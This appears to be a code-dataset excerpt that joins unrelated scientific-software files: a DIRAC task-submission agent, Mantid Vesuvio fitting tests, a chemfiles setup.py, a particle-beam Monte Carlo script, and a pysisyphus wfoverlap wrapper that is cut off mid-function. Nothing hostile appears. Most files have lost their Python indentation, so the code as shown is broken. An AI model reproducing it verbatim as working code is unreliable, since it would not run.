for lfn, status in statusDict.items():
setFileStatus = fileReport.setFileStatus( transID, lfn, status )
if not setFileStatus['OK']:
return setFileStatus
commit = fileReport.commit()
if not commit['OK']:
self._logError( "Failed to update file states for transformation: %s" % commit['Message'],
transID = transID, method = 'updateFileStatus' )
return commit
else:
self._logInfo( "Updated the states of %d files" % len( commit['Value'] ),
transID = transID, method = 'updateFileStatus' )
return S_OK()
def checkReservedTasks( self, transIDOPBody, clients ):
""" Checking Reserved tasks
"""
transID = transIDOPBody.keys()[0]
# Select the tasks which have been in Reserved status for more than 1 hour for selected transformations
condDict = {"TransformationID":transID, "ExternalStatus":'Reserved'}
time_stamp_older = str( datetime.datetime.utcnow() - datetime.timedelta( hours = 1 ) )
time_stamp_newer = str( datetime.datetime.utcnow() - datetime.timedelta( days = 7 ) )
res = clients['TransformationClient'].getTransformationTasks( condDict = condDict, older = time_stamp_older,
newer = time_stamp_newer )
self._logDebug( "getTransformationTasks(%s) return value: %s" % ( condDict, res ),
method = 'checkReservedTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to get Reserved tasks: %s" % res['Message'],
transID = transID, method = 'checkReservedTasks' )
return res
if not res['Value']:
self._logVerbose( "No Reserved tasks found", transID = transID )
return res
reservedTasks = res['Value']
res = clients['TaskManager'].updateTransformationReservedTasks( reservedTasks )
self._logDebug( "updateTransformationReservedTasks(%s) return value: %s" % ( reservedTasks, res ),
method = 'checkReservedTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to update transformation reserved tasks: %s" % res['Message'],
transID = transID, method = 'checkReservedTasks' )
return res
noTasks = res['Value']['NoTasks']
taskNameIDs = res['Value']['TaskNameIDs']
# For the tasks with no associated request found re-set the status of the task in the transformationDB
for taskName in noTasks:
transID, taskID = taskName.split( '_' )
self._logInfo( "Resetting status of %s to Created as no associated task found" % ( taskName ),
transID = transID, method = 'checkReservedTasks' )
res = clients['TransformationClient'].setTaskStatus( int( transID ), int( taskID ), 'Created' )
if not res['OK']:
self._logError( "Failed to update task status and ID after recovery: %s %s" % ( taskName, res['Message'] ),
transID = transID, method = 'checkReservedTasks' )
return res
# For the tasks for which an associated request was found update the task details in the transformationDB
for taskName, extTaskID in taskNameIDs.items():
transID, taskID = taskName.split( '_' )
self._logInfo( "Setting status of %s to Submitted with ID %s" % ( taskName, extTaskID ),
transID = transID, method = 'checkReservedTasks' )
setTaskStatusAndWmsID = clients['TransformationClient'].setTaskStatusAndWmsID( int( transID ), int( taskID ),
'Submitted', str( extTaskID ) )
if not setTaskStatusAndWmsID['OK']:
self._logError( "Failed to update task status and ID after recovery: %s %s" % ( taskName,
setTaskStatusAndWmsID['Message'] ),
transID = transID, method = 'checkReservedTasks' )
return setTaskStatusAndWmsID
return S_OK()
def submitTasks( self, transIDOPBody, clients ):
""" Submit the tasks to an external system, using the taskManager provided
"""
transID = transIDOPBody.keys()[0]
transBody = transIDOPBody[transID]['Body']
tasksToSubmit = clients['TransformationClient'].getTasksToSubmit( transID, self.tasksPerLoop )
self._logDebug( "getTasksToSubmit(%s, %s) return value: %s" % ( transID, self.tasksPerLoop, tasksToSubmit ),
method = 'submitTasks', transID = transID )
if not tasksToSubmit['OK']:
self._logError( "Failed to obtain tasks: %s" % tasksToSubmit['Message'], transID = transID, method = 'submitTasks' )
return tasksToSubmit
tasks = tasksToSubmit['Value']['JobDictionary']
if not tasks:
self._logVerbose( "No tasks found for submission", transID = transID, method = 'submitTasks' )
return tasksToSubmit
self._logInfo( "Obtained %d tasks for submission" % len( tasks ), transID = transID, method = 'submitTasks' )
preparedTransformationTasks = clients['TaskManager'].prepareTransformationTasks( transBody, tasks,
self.owner, self.ownerGroup, self.ownerDN )
self._logDebug( "prepareTransformationTasks return value: %s" % preparedTransformationTasks,
method = 'submitTasks', transID = transID )
if not preparedTransformationTasks['OK']:
self._logError( "Failed to prepare tasks: %s" % preparedTransformationTasks['Message'],
transID = transID, method = 'submitTasks' )
return preparedTransformationTasks
    res = self.__actualSubmit( preparedTransformationTasks, clients, transID )
    if not res['OK']:
      return res
    res = clients['TaskManager'].updateDBAfterTaskSubmission( res['Value'] )
self._logDebug( "updateDBAfterTaskSubmission return value: %s" % res, method = 'submitTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to update DB after task submission: %s" % res['Message'],
transID = transID, method = 'submitTasks' )
return res
return S_OK()
# This gSynchro is necessary in order to avoid race conditions when submitting to the WMS,
# because WMSClient wants jobDescription.xml to be present in the local directory prior to submission
@gSynchro
def __actualSubmit( self, preparedTransformationTasks, clients, transID ):
""" This function contacts either RMS or WMS depending on the type of transformation.
"""
res = clients['TaskManager'].submitTransformationTasks( preparedTransformationTasks['Value'] )
self._logDebug( "submitTransformationTasks return value: %s" % res, method = 'submitTasks', transID = transID )
if not res['OK']:
self._logError( "Failed to submit prepared tasks: %s" % res['Message'],
transID = transID, method = 'submitTasks' )
return res
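# Minimal sketch of an extension (editor's illustration; the class and option
# names below are assumptions, not the real WorkflowTaskAgent/RequestTaskAgent
# code), following the notes on initialize and _getClients above:
#
# class MyTaskAgent( TaskManagerAgentBase ):
#   def initialize( self ):
#     res = TaskManagerAgentBase.initialize( self )
#     if not res['OK']:
#       return res
#     self.transType = self.am_getOption( 'TransType', ['MCSimulation'] )
#     return S_OK()
#
#   def _getClients( self ):
#     # Reuse the default clients; swap 'TaskManager' here if tasks should
#     # go to a system other than the WMS.
#     return TaskManagerAgentBase._getClients( self )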
|
Sbalbp/DIRAC
|
TransformationSystem/Agent/TaskManagerAgentBase.py
|
Python
|
gpl-3.0
| 25,297
|
[
"DIRAC"
] |
cbb5a3871b8ef20b3b2151c0aa98e74660626cd1739c1d0e2140b04d7c119510
|
# pylint: disable=no-init
"""These are more integration tests as they will require that the test data is available
and that mantid can be imported
"""
import stresstesting
import platform
import numpy as np
from mantid.api import (WorkspaceGroup, MatrixWorkspace)
from mantid.simpleapi import *
from vesuvio.commands import fit_tof
# =====================================Helper Function=================================
def _is_old_boost_version():
    # It appears that a difference in boost version causes different
    # random number generation. As such, an OS check is used.
    # Older boost (earlier than 1.56): Ubuntu 14.04, RHEL7
dist = platform.linux_distribution()
if any(dist):
if 'Red Hat' in dist[0] and dist[1].startswith('7'):
return True
if dist[0] == 'Ubuntu' and dist[1] == '14.04':
return True
return False
def _create_test_flags(background, multivariate=False):
flags = dict()
flags['fit_mode'] = 'spectrum'
flags['spectra'] = '135'
if multivariate:
mass1 = {'value': 1.0079, 'function': 'MultivariateGaussian', 'SigmaX': 5, 'SigmaY': 5, 'SigmaZ': 5}
else:
mass1 = {'value': 1.0079, 'function': 'GramCharlier', 'width': [2, 5, 7],
'hermite_coeffs': [1, 0, 0], 'k_free': 0, 'sears_flag': 1}
mass2 = {'value': 16.0, 'function': 'Gaussian', 'width': 10}
mass3 = {'value': 27.0, 'function': 'Gaussian', 'width': 13}
mass4 = {'value': 133.0, 'function': 'Gaussian', 'width': 30}
flags['masses'] = [mass1, mass2, mass3, mass4]
flags['intensity_constraints'] = [0, 1, 0, -4]
if background:
flags['background'] = {'function': 'Polynomial', 'order': 3}
else:
flags['background'] = None
flags['ip_file'] = 'Vesuvio_IP_file_test.par'
flags['diff_mode'] = 'single'
flags['gamma_correct'] = True
flags['ms_flags'] = dict()
flags['ms_flags']['SampleWidth'] = 10.0
flags['ms_flags']['SampleHeight'] = 10.0
flags['ms_flags']['SampleDepth'] = 0.5
flags['ms_flags']['SampleDensity'] = 241
flags['fit_minimizer'] = 'Levenberg-Marquardt,AbsError=1e-08,RelError=1e-08'
return flags
def _equal_within_tolerance(self, expected, actual, tolerance=0.05):
"""
    Checks that the expected value is equal to the actual value to within the given fractional tolerance
"""
tolerance_value = expected * tolerance
abs_difference = abs(expected - actual)
self.assertTrue(abs_difference <= abs(tolerance_value))
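# For example (editor's note), with the default 5% tolerance:
#   _equal_within_tolerance(self, 100.0, 104.0)  # passes: |100 - 104| = 4 <= 5
#   _equal_within_tolerance(self, 100.0, 106.0)  # fails:  |100 - 106| = 6 >  5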
def _get_peak_height_and_index(workspace, ws_index):
"""
    Returns the maximum height in y of a given spectrum of a workspace,
    together with the bin index at which it occurs.
    The workspace is assumed to be a matrix workspace.
"""
y_data = workspace.readY(ws_index)
peak_height = np.amax(y_data)
peak_bin = np.argmax(y_data)
return peak_height, peak_bin
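# Editor's summary, inferred from the assertions in the tests below: fit_tof()
# returns a 4-tuple of (fitted spectra as a WorkspaceGroup, fit parameters as a
# MatrixWorkspace, list of chi-squared values, exit iteration as an int).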
# ====================================================================================
class FitSingleSpectrumNoBackgroundTest(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=False)
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
self.assertEqual(4, len(self._fit_results))
fitted_wsg = self._fit_results[0]
self.assertTrue(isinstance(fitted_wsg, WorkspaceGroup))
self.assertEqual(1, len(fitted_wsg))
fitted_ws = fitted_wsg[0]
self.assertTrue(isinstance(fitted_ws, MatrixWorkspace))
self.assertEqual(7, fitted_ws.getNumberHistograms())
self.assertAlmostEqual(50.0, fitted_ws.readX(0)[0])
self.assertAlmostEqual(562.0, fitted_ws.readX(0)[-1])
index_one_first = -0.013011414483
index_one_last = 0.00720741862173
index_two_first = 1.12713408816e-05
index_two_last = 6.90222280789e-05
if _is_old_boost_version():
index_one_first = 0.000631295911554
_equal_within_tolerance(self, index_one_first, fitted_ws.readY(0)[0])
_equal_within_tolerance(self, index_one_last, fitted_ws.readY(0)[-1])
_equal_within_tolerance(self, index_two_first, fitted_ws.readY(1)[0])
_equal_within_tolerance(self, index_two_last, fitted_ws.readY(1)[-1])
fitted_params = self._fit_results[1]
self.assertTrue(isinstance(fitted_params, MatrixWorkspace))
self.assertEqual(14, fitted_params.getNumberHistograms())
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(1, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
class FitSingleSpectrumBivariateGaussianTiesTest(stresstesting.MantidStressTest):
"""
Test ensures that internal ties for mass profiles work correctly
This test ties SigmaX to SigmaY making the multivariate gaussian
a Bivariate Gaussian
"""
def excludeInPullRequests(self):
return True
def runTest(self):
flags = _create_test_flags(background=False, multivariate=True)
flags['masses'][0]['ties'] = 'SigmaX=SigmaY'
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
# Get fit workspace
fit_params = mtd['15039-15045_params_iteration_1']
f0_sigma_x = fit_params.readY(2)[0]
f0_sigma_y = fit_params.readY(3)[0]
self.assertAlmostEqual(f0_sigma_x, f0_sigma_y)
# ====================================================================================
class SingleSpectrumBackground(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=True)
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
self.assertEqual(4, len(self._fit_results))
fitted_wsg = self._fit_results[0]
self.assertTrue(isinstance(fitted_wsg, WorkspaceGroup))
self.assertEqual(1, len(fitted_wsg))
fitted_ws = fitted_wsg[0]
self.assertTrue(isinstance(fitted_ws, MatrixWorkspace))
self.assertEqual(8, fitted_ws.getNumberHistograms())
self.assertAlmostEqual(50.0, fitted_ws.readX(0)[0])
self.assertAlmostEqual(562.0, fitted_ws.readX(0)[-1])
index_one_first = -0.00553133541138
index_one_last = 0.00722053823154
calc_data_height_expected = 0.13302098172
calc_data_bin_expected = 635
if _is_old_boost_version():
index_one_first = 0.000605572768745
_equal_within_tolerance(self, index_one_first, fitted_ws.readY(0)[0])
_equal_within_tolerance(self, index_one_last, fitted_ws.readY(0)[-1])
calc_data_height_actual, calc_data_bin_actual = _get_peak_height_and_index(fitted_ws, 1)
_equal_within_tolerance(self, calc_data_height_expected, calc_data_height_actual)
self.assertTrue(abs(calc_data_bin_expected - calc_data_bin_actual) <= 1)
fitted_params = self._fit_results[1]
self.assertTrue(isinstance(fitted_params, MatrixWorkspace))
self.assertEqual(18, fitted_params.getNumberHistograms())
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(1, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
class BankByBankForwardSpectraNoBackground(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=False)
flags['fit_mode'] = 'bank'
flags['spectra'] = 'forward'
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
        self.assertEqual(4, len(self._fit_results))
fitted_banks = self._fit_results[0]
self.assertTrue(isinstance(fitted_banks, WorkspaceGroup))
self.assertEqual(8, len(fitted_banks))
bank1 = fitted_banks[0]
self.assertTrue(isinstance(bank1, MatrixWorkspace))
self.assertAlmostEqual(50.0, bank1.readX(0)[0])
self.assertAlmostEqual(562.0, bank1.readX(0)[-1])
_equal_within_tolerance(self, 8.23840378769e-05, bank1.readY(1)[0])
_equal_within_tolerance(self, 0.000556695665501, bank1.readY(1)[-1])
bank8 = fitted_banks[7]
self.assertTrue(isinstance(bank8, MatrixWorkspace))
self.assertAlmostEqual(50.0, bank8.readX(0)[0])
self.assertAlmostEqual(562.0, bank8.readX(0)[-1])
_equal_within_tolerance(self, 0.00025454613205, bank8.readY(1)[0])
_equal_within_tolerance(self, 0.00050412575393, bank8.readY(1)[-1])
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(8, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
class SpectraBySpectraForwardSpectraNoBackground(stresstesting.MantidStressTest):
_fit_results = None
def runTest(self):
flags = _create_test_flags(background=False)
flags['fit_mode'] = 'spectra'
flags['spectra'] = '143-144'
runs = "15039-15045"
self._fit_results = fit_tof(runs, flags)
def validate(self):
self.assertTrue(isinstance(self._fit_results, tuple))
        self.assertEqual(4, len(self._fit_results))
fitted_spec = self._fit_results[0]
self.assertTrue(isinstance(fitted_spec, WorkspaceGroup))
self.assertEqual(2, len(fitted_spec))
spec143 = fitted_spec[0]
self.assertTrue(isinstance(spec143, MatrixWorkspace))
self.assertAlmostEqual(50.0, spec143.readX(0)[0])
self.assertAlmostEqual(562.0, spec143.readX(0)[-1])
_equal_within_tolerance(self, 2.27289862507e-06, spec143.readY(1)[0])
_equal_within_tolerance(self, 3.49287467421e-05, spec143.readY(1)[-1])
spec144 = fitted_spec[1]
self.assertTrue(isinstance(spec144, MatrixWorkspace))
self.assertAlmostEqual(50.0, spec144.readX(0)[0])
self.assertAlmostEqual(562.0, spec144.readX(0)[-1])
_equal_within_tolerance(self, 5.9811662524e-06, spec144.readY(1)[0])
_equal_within_tolerance(self, 4.7479831769e-05, spec144.readY(1)[-1])
chisq_values = self._fit_results[2]
self.assertTrue(isinstance(chisq_values, list))
self.assertEqual(2, len(chisq_values))
exit_iteration = self._fit_results[3]
self.assertTrue(isinstance(exit_iteration, int))
# ====================================================================================
|
dymkowsk/mantid
|
Testing/SystemTests/tests/analysis/VesuvioCommandsTest.py
|
Python
|
gpl-3.0
| 11,168
|
[
"Gaussian"
] |
82d2e3a57939a4b1423b578ed8bb11447b1938f4ecc8b717dc2d89478c512353
|
# -*- coding=utf-8 -*-
from wheel.bdist_wheel import bdist_wheel
from skbuild import setup
import sys
import os
import re
# Read the version from chemfiles/__init__.py without importing chemfiles
__version__ = re.search(
r'__version__\s*=\s*[\'"]([^\'"]*)[\'"]', open("chemfiles/__init__.py").read()
).group(1)
class universal_wheel(bdist_wheel):
# Workaround until https://github.com/pypa/wheel/issues/185 is resolved
def get_tag(self):
tag = bdist_wheel.get_tag(self)
return ("py2.py3", "none") + tag[2:]
install_requires = ["numpy"]
if sys.hexversion < 0x03040000:
install_requires.append("enum34")
# scikit-build options
cmake_args = []
if sys.platform.startswith("darwin"):
cmake_args.append("-DCMAKE_OSX_DEPLOYMENT_TARGET:STRING=10.9")
if os.getenv("CHFL_PY_INTERNAL_CHEMFILES"):
cmake_args.append("-DCHFL_PY_INTERNAL_CHEMFILES=ON")
def _get_lib_ext():
if sys.platform.startswith("win32"):
ext = ".dll"
elif sys.platform.startswith("darwin"):
ext = ".dylib"
elif sys.platform.startswith("linux"):
ext = ".so"
else:
raise Exception("Unknown operating system: %s" % sys.platform)
return ext
setup(
version=__version__,
install_requires=install_requires,
cmdclass={"bdist_wheel": universal_wheel},
cmake_args=cmake_args,
packages=["chemfiles"],
package_data={
"chemfiles": [
"*" + _get_lib_ext(),
"bin/*" + _get_lib_ext(),
]
},
exclude_package_data={
"chemfiles": [
"include/*",
]
},
)
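# Example invocations (editor's sketch): a regular build uses the default
# chemfiles sources, while setting the environment variable checked above
# forces scikit-build to compile the bundled C++ library:
#
#   pip install .
#   CHFL_PY_INTERNAL_CHEMFILES=1 pip install .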
|
Luthaf/Chemharp-python
|
setup.py
|
Python
|
mpl-2.0
| 1,599
|
[
"Chemfiles"
] |
2a60e5fd562ab3054f42a87e64668809e5d92de9f928877532358b6a6c022f7a
|
#!/usr/bin/env python3
import json
import random
import const
from const import MM, MEV
from particle import Particle
from detector import Detector
from initial import Beam, Profile, Energy
random.seed(91400)
N = 1000
# Define the beam parameters
beam = Beam(
# Initial position is in a centered uniform disc with 50 mm diameter
profile=Profile(
centre=0,
diameter=50*MM,
shape=const.UNIFORM,
),
# Energy has a Gaussian distribution with a mean of 25 MeV and a
# standard deviation of 5 MeV
energy=Energy(
mean=25*MEV,
width=5*MEV,
shape=const.GAUSSIAN
),
# Initial direction is in a cone between 0 and 30 degrees
divergence=30
)
# Define the detector
detector = Detector(
voxels=5,
size=100*MM
)
for _ in range(N):
# Generate a new particle from the beam
particle = Particle(beam)
# We keep tracking as long as we have energy left and the particle
# is within the detector.
while particle.energy > 0 and detector.voxel(particle.position):
particle.propagate(detector)
result = detector.dump()
with open('energy-deposit.json', 'w') as outfile:
outfile.write(json.dumps(result))
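# Sketch of the per-particle sampling the Beam presumably performs (editor's
# illustration; the real implementation lives in initial.py, not shown here):
#
#   import math, random
#   energy = random.gauss(25*MEV, 5*MEV)          # const.GAUSSIAN energy
#   r = (50*MM / 2) * math.sqrt(random.random())  # uniform over the disc
#   phi = 2 * math.pi * random.random()
#   x, y = r * math.cos(phi), r * math.sin(phi)   # const.UNIFORM profile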
|
DanielBrookRoberge/MonteCarloExamples
|
particle-beam/particle-beam.py
|
Python
|
mpl-2.0
| 1,211
|
[
"Gaussian"
] |
3c7ae57affd91c9b8d40e1b59f479a82f06721655880f468edcabd08fdfaf557
|
from collections import OrderedDict
import itertools
import logging
from pathlib import Path
import shutil
import subprocess
import tempfile
import numpy as np
import pyparsing as pp
from pysisyphus.config import Config
from pysisyphus.helpers_pure import chunks
CIOVL="""mix_aoovl=ao_ovl
a_mo=mos.1
b_mo=mos.2
ncore={ncore}
a_det=dets.1
b_det=dets.2
a_mo_read=2
b_mo_read=2
"""
CIOVL_NO_SAO="""ao_read=-1
same_aos=.true.
a_mo=mos.1
b_mo=mos.2
ncore={ncore}
a_det=dets.1
b_det=dets.2
a_mo_read=2
b_mo_read=2"""
class WFOWrapper:
logger = logging.getLogger("wfoverlap")
matrix_types = OrderedDict((
("ovlp", "Overlap matrix"),
("renorm", "Renormalized overlap matrix"),
("ortho", "Orthonormalized overlap matrix")
))
def __init__(self, occ_mo_num, virt_mo_num, conf_thresh=1e-3,
calc_number=0, out_dir="./", wfow_mem=8000,
ncore=0, debug=False):
        # Should correspond to the attribute of the parent calculator.
        # Set calc_number/name first, as self.log() below relies on self.name.
        self.calc_number = calc_number
        self.name = f"WFOWrapper_{self.calc_number}"
        try:
            self.base_cmd = Config["wfoverlap"]["cmd"]
        except KeyError:
            self.base_cmd = None
            self.log("WFOverlap cmd not found in ~/.pysisyphusrc!")
self.conf_thresh = conf_thresh
self.out_dir = Path(out_dir).resolve()
self.wfow_mem = int(wfow_mem)
self.ncore = int(ncore)
self.debug = debug
self.log(f"Using -m {self.wfow_mem} for wfoverlap.")
self.mo_inds_list = list()
self.from_set_list = list()
self.to_set_list = list()
self.turbo_mos_list = list()
self.occ_mo_num = int(occ_mo_num)
self.virt_mo_num = int(virt_mo_num)
self.mo_num = self.occ_mo_num + self.virt_mo_num
self.base_det_str = "d"*self.occ_mo_num + "e"*self.virt_mo_num
self.fmt = "{: .10f}"
self.iter_counter = 0
@property
def conf_thresh(self):
return self._conf_thresh
@conf_thresh.setter
def conf_thresh(self, conf_thresh):
self._conf_thresh = conf_thresh
self.log(f"Set CI-coeff threshold to {self.conf_thresh:.4e}")
def log(self, message):
self.logger.debug(f"{self.name}, " + message)
def fake_turbo_mos(self, mo_coeffs):
"""Create a mos file suitable for TURBOMOLE input. All MO eigenvalues
are set to 0.0. There is also a little deviation in the formatting
(see turbo_fmt()) but it works ..."""
def turbo_fmt(num):
"""Not quite the real TURBOMOLE format, but it works ...
In TURBOMOLE the first character is always 0 for positive doubles
and - for negative doubles."""
return f"{num:+20.13E}".replace("E", "D")
base = "$scfmo scfconv=7 format(4d20.14)\n# from pysisyphus\n" \
"{mo_strings}\n$end"
        # WFOverlap expects the string "eigenvalue" starting at 16, so we have to format the MO header line accordingly.
mo_str = "{mo_index:>6d} a eigenvalue=-.00000000000000D+00 " \
"nsaos={nsaos}\n{joined}"
nsaos = mo_coeffs.shape[0]
mo_strings = list()
for mo_index, mo in enumerate(mo_coeffs, 1):
in_turbo_fmt = [turbo_fmt(c) for c in mo]
# Combine into chunks of four
lines = ["".join(chnk) for chnk in chunks(in_turbo_fmt, 4)]
# Join the lines
joined = "\n".join(lines)
mo_strings.append(mo_str.format(mo_index=mo_index, nsaos=nsaos,
joined=joined))
return base.format(mo_strings="\n".join(mo_strings))
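    # Example (editor's illustration): turbo_fmt(0.5) yields
    # "+5.0000000000000D-01", whereas real TURBOMOLE would start a positive
    # double with "0" instead of the explicit sign (see the docstring above).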
def ci_coeffs_above_thresh(self, ci_coeffs, thresh=None):
# Drop unimportant configurations, that are configurations
# having low weights in all states under consideration.
if thresh is None:
thresh = self.conf_thresh
mo_inds = np.where(np.abs(ci_coeffs) >= thresh)
return mo_inds
def make_det_string(self, inds):
"""Return spin adapted strings."""
from_mo, to_mo = inds
        # Until now the first virtual MO (to_mo) has index 0. To substitute
        # the base_det_str at the correct index we have to increase all to_mo
        # indices by the number of occupied MOs.
to_mo += self.occ_mo_num
# Make string for excitation of an alpha electron
ab = list(self.base_det_str)
ab[from_mo] = "b"
ab[to_mo] = "a"
ab_str = "".join(ab)
        # Make string for excitation of a beta electron
ba = list(self.base_det_str)
ba[from_mo] = "a"
ba[to_mo] = "b"
ba_str = "".join(ba)
return ab_str, ba_str
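    # Worked example (editor's note): with occ_mo_num=3 and virt_mo_num=2 the
    # reference string is "dddee"; inds=(1, 0), i.e. occupied MO 1 into the
    # first virtual MO, yields the spin-adapted pair ("dbdae", "dadbe").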
def generate_all_dets(self, occ_set1, virt_set1, occ_set2, virt_set2):
"""Generate all possible single excitation determinant strings
from union(occ_mos) to union(virt_mos)."""
# Unite the respective sets of both calculations
occ_set = occ_set1 | occ_set2
virt_set = virt_set1 | virt_set2
        # Generate all possible excitations (combinations) from the occupied
        # MO set to the virtual MO set.
all_inds = [(om, vm) for om, vm
in itertools.product(occ_set, virt_set)]
det_strings = [self.make_det_string(inds) for inds in all_inds]
return all_inds, det_strings
def make_full_dets_list(self, all_inds, det_strings, ci_coeffs):
dets_list = list()
for inds, det_string in zip(all_inds, det_strings):
ab, ba = det_string
from_mo, to_mo = inds
per_state = ci_coeffs[:,from_mo,to_mo]
if (np.abs(per_state) < self.conf_thresh).all():
continue
# A singlet determinant can be formed in two ways:
# (up down) (up down) (up down) ...
# or
# (down up) (down up) (down up) ...
# We take this into account by expanding the singlet determinants
# and using a proper normalization constant.
# See 10.1063/1.3000012 Eq. (5) and 10.1021/acs.jpclett.7b01479 SI
# and "Principles of Molecular Photochemistry: An Introduction",
# Section 2.27 Vector model of Two Coupled Electron Spins, p. 91-92
per_state *= 1/(2**0.5)
as_str = lambda arr: " ".join([self.fmt.format(cic)
for cic in arr])
ps_str = as_str(per_state)
mps_str = as_str(-per_state)
dets_list.append(f"{ab}\t{ps_str}")
dets_list.append(f"{ba}\t{mps_str}")
return dets_list
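    # Normalization check (editor's note): each configuration with CI
    # coefficient c is written as the two determinants above with weights
    # +c/sqrt(2) and -c/sqrt(2), so (c/sqrt(2))**2 + (-c/sqrt(2))**2 = c**2
    # and the pair together carries the original weight of the excitation.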
def set_from_nested_list(self, nested):
return set([i for i in itertools.chain(*nested)])
def make_dets_header(self, cic, dets_list):
return f"{len(cic)} {self.mo_num} {len(dets_list)}"
def parse_wfoverlap_out(self, text, type_="ortho"):
"""Returns overlap matrix."""
header_str = self.matrix_types[type_] + " <PsiA_i|PsiB_j>"
header = pp.Literal(header_str)
float_ = pp.Word(pp.nums+"-.")
psi_bra = pp.Literal("<Psi") + pp.Word(pp.alphas) \
+ pp.Word(pp.nums) + pp.Literal("|")
psi_ket = pp.Literal("|Psi") + pp.Word(pp.alphas) \
+ pp.Word(pp.nums) + pp.Literal(">")
matrix_line = pp.Suppress(psi_bra) + pp.OneOrMore(float_)
        # For reasons that are not understood, this replacement is needed;
        # otherwise overlap calculations with the true AO overlap matrix
        # cannot be parsed, even though the files appear completely similar
        # regarding the printing of the matrices.
text = text.replace("\n", " ")
parser = pp.SkipTo(header, include=True) \
+ pp.OneOrMore(psi_ket) \
+ pp.OneOrMore(matrix_line).setResultsName("overlap")
result = parser.parseString(text)
        return np.array(list(result["overlap"]), dtype=float)  # np.float is deprecated
def get_from_to_sets(self, ci_coeffs):
all_mo_inds = [self.ci_coeffs_above_thresh(per_state)
for per_state in ci_coeffs]
from_mos, to_mos = zip(*all_mo_inds)
from_set = self.set_from_nested_list(from_mos)
to_set = self.set_from_nested_list(to_mos)
return from_set, to_set
def get_gs_line(self, ci_coeffs_with_gs):
gs_coeffs = np.zeros(len(ci_coeffs_with_gs))
# Ground state is 100% HF configuration
gs_coeffs[0] = 1
gs_coeffs_str = " ".join([self.fmt.format(c)
for c in gs_coeffs])
gs_line = f"{self.base_det_str}\t{gs_coeffs_str}"
return gs_line
def wf_overlap(self, cycle1, cycle2, ao_ovlp=None):
mos1, cic1 = cycle1
mos2, cic2 = cycle2
fs1, ts1 = self.get_from_to_sets(cic1)
fs2, ts2 = self.get_from_to_sets(cic2)
# Create a fake array for the ground state where all CI coefficients
# are zero and add it.
gs_cic = np.zeros_like(cic1[0])
cic1_with_gs = np.concatenate((gs_cic[None,:,:], cic1))
cic2_with_gs = np.concatenate((gs_cic[None,:,:], cic2))
all_inds, det_strings = self.generate_all_dets(fs1, ts1, fs2, ts2)
# Prepare lines for ground state
gs_line1 = self.get_gs_line(cic1_with_gs)
gs_line2 = self.get_gs_line(cic2_with_gs)
dets1 = [gs_line1] + self.make_full_dets_list(all_inds,
det_strings,
cic1_with_gs)
dets2 = [gs_line2] + self.make_full_dets_list(all_inds,
det_strings,
cic2_with_gs)
header1 = self.make_dets_header(cic1_with_gs, dets1)
header2 = self.make_dets_header(cic2_with_gs, dets2)
backup_path = self.out_dir / f"wfo_{self.calc_number}.{self.iter_counter:03d}"
with tempfile.TemporaryDirectory() as tmp_dir:
tmp_path = Path(tmp_dir)
self.log(f"Calculation in {tmp_dir}")
# Write fake TURBOMOLE mo files
for i, mos in enumerate((mos1, mos2), 1):
turbo_mos = self.fake_turbo_mos(mos)
with open(tmp_path / f"mos.{i}", "w") as handle:
handle.write(turbo_mos)
dets1_path = tmp_path / "dets.1"
with open(dets1_path, "w") as handle:
handle.write(header1+"\n"+"\n".join(dets1))
dets2_path = tmp_path / "dets.2"
with open(dets2_path, "w") as handle:
handle.write(header2+"\n"+"\n".join(dets2))
            # Decide whether to use a double-molecule overlap matrix or to
            # (approximately) reconstruct the ao_ovlp matrix from the MO
            # coefficients.
if ao_ovlp is None:
ciovl_in = CIOVL_NO_SAO
self.log("Got no ao_ovl-matrix. Using ao_read=-1 and "
"same_aos=.true. to reconstruct the AO-overlap matrix!")
else:
ciovl_in = CIOVL
ao_header = "{} {}".format(*ao_ovlp.shape)
ao_ovl_path = tmp_path / "ao_ovl"
np.savetxt(ao_ovl_path, ao_ovlp, fmt="%22.15E", header=ao_header,
comments="")
ciovl_in_rendered = ciovl_in.format(ncore=self.ncore)
ciovl_fn = "ciovl.in"
with open(tmp_path / ciovl_fn, "w") as handle:
handle.write(ciovl_in_rendered)
# Create a backup of the whole temporary directory
try:
shutil.rmtree(backup_path)
except FileNotFoundError:
pass
shutil.copytree(tmp_dir, backup_path)
# Currently, debug==True crashes the subsequent parsing
debug_str = "--debug" if self.debug else ""
cmd = f"{self.base_cmd} -m {self.wfow_mem} -f {ciovl_fn} {debug_str}".split()
result = subprocess.Popen(cmd, cwd=tmp_path,
stdout=subprocess.PIPE)
result.wait()
stdout = result.stdout.read().decode("utf-8")
self.iter_counter += 1
if "differs significantly" in stdout:
self.log("WARNING: Orthogonalized matrix differs significantly "
"from original matrix! There is probably mixing with "
"external states.")
wfo_log_fn = self.out_dir / f"wfo_{self.calc_number}.{self.iter_counter:03d}.out"
with open(wfo_log_fn, "w") as handle:
handle.write(stdout)
# Also copy the WFO-output to the input backup
shutil.copy(wfo_log_fn, backup_path)
matrices = [self.parse_wfoverlap_out(stdout, type_=key)
for key in self.matrix_types.keys()]
reshaped_mats = [mat.reshape(-1, len(cic2_with_gs))
for mat in matrices]
for key, mat in zip(self.matrix_types.keys(), reshaped_mats):
mat_fn = backup_path / f"{key}_mat.dat"
